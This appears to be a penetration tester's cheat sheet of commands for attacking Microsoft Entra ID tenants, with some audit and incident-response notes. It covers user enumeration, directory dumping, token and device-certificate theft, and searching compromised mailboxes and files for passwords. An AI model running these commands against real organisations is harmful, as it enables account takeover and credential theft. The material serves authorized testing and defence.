ENTRA-ID-ATTACKS
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
OVERVIEW#
Entra ID (formerly Azure AD) is Microsoft's cloud identity plane behind M365 and Azure. This sheet covers recon, enumeration, token abuse, and post-compromise tooling (ROADtools, AADInternals, GraphRunner, AzureHound) relevant to financial-sector M365 tenants.
UNAUTHENTICATED RECON#
# Validate a tenant exists / get tenant ID: curl https://login.microsoftonline.com/<domain>/.well-known/openid-configuration # User enumeration via login endpoint response codes # (careful: may trip Smart Lockout / Identity Protection) python3 o365spray.py --validate --domain <domain> python3 o365spray.py --enum --domain <domain> -U users.txt
ROADTOOLS (roadrecon)#
roadrecon auth -u user@domain -p pass # Authenticate, cache tokens roadrecon auth --device-code # Device code flow roadrecon gather # Dump directory to local DB roadrecon gui # Browse the gathered data roadrecon dump # Export objects # roadrecon plugins: policies, road2timeline, etc.
AADINTERNALS#
Get-AADIntLoginInformation -Domain <domain> # Tenant recon Get-AADIntTenantID -Domain <domain> # Resolve tenant ID Invoke-AADIntReconAsOutsider -DomainName <d> # External recon Get-AADIntAccessTokenForAADGraph # Acquire token Export-AADIntLocalDeviceCertificate # Device cert theft # AADInternals covers token forging, PTA/seamless SSO abuse, # and federation (Golden SAML) research - lab use only
GRAPHRUNNER#
# Post-auth toolkit against Microsoft Graph: Get-GraphTokens # Interactive token grab Invoke-GraphRecon # Tenant + permission recon Invoke-DumpApps # App registrations + secrets Invoke-SearchMailbox -Terms password # Hunt mail for creds Invoke-SearchSharePointAndOneDrive # Hunt files for secrets Invoke-GraphOpenInboxFinder # Find readable mailboxes
AZUREHOUND (BloodHound)#
azurehound -u user@domain -p pass list --tenant <id> -o out.json azurehound --refresh-token <rt> list --tenant <id> -o out.json # Import out.json into BloodHound to map Azure attack paths: # - AZUserAccessAdministrator, AZOwner, AZGlobalAdmin edges # - Escalation via app ownership, role assignment, VM run-command
TOKEN & DEVICE ABUSE#
# Primary Refresh Token (PRT) enables SSO impersonation # Extract tokens from a compromised host (mimikatz/ROADtoken) # Refresh tokens are long-lived - prioritize revocation in IR az account get-access-token # If az CLI is logged in az account get-access-token --resource https://graph.microsoft.com
CONDITIONAL ACCESS & MFA REVIEW#
# Defensive/audit angle - enumerate CA policy gaps: roadrecon plugin policies # Dump CA policies # Look for: legacy auth allowed, no MFA on admins, device-only # trust bypasses, broad "trusted location" exclusions, missing # risk-based sign-in policies
EXAMPLES#
# External footprint of a tenant before any auth Invoke-AADIntReconAsOutsider -DomainName targetbank.lu # Full directory gather for offline analysis roadrecon auth --device-code && roadrecon gather && roadrecon gui # Map cloud privilege escalation paths in BloodHound azurehound --refresh-token $RT list --tenant $TID -o azure.json # Hunt a compromised mailbox set for plaintext secrets Invoke-SearchMailbox -Terms "password,vpn,secret" -MessageCount 200
NOTES#
- Entra ID rename: "Azure AD" == "Entra ID" (same product) - Prefer device-code / refresh-token flows to reduce noise vs password spray, which triggers Identity Protection - Most impactful IR control: revoke refresh tokens + reset PRT, not just password reset - Golden SAML / federation abuse requires ADFS or token-signing key access - strictly lab/authorized engagement only - Pair with DEFENDER-KQL / SENTINEL-KQL sheets for the detection side - For LU FS clients this maps to DORA ICT risk + identity governance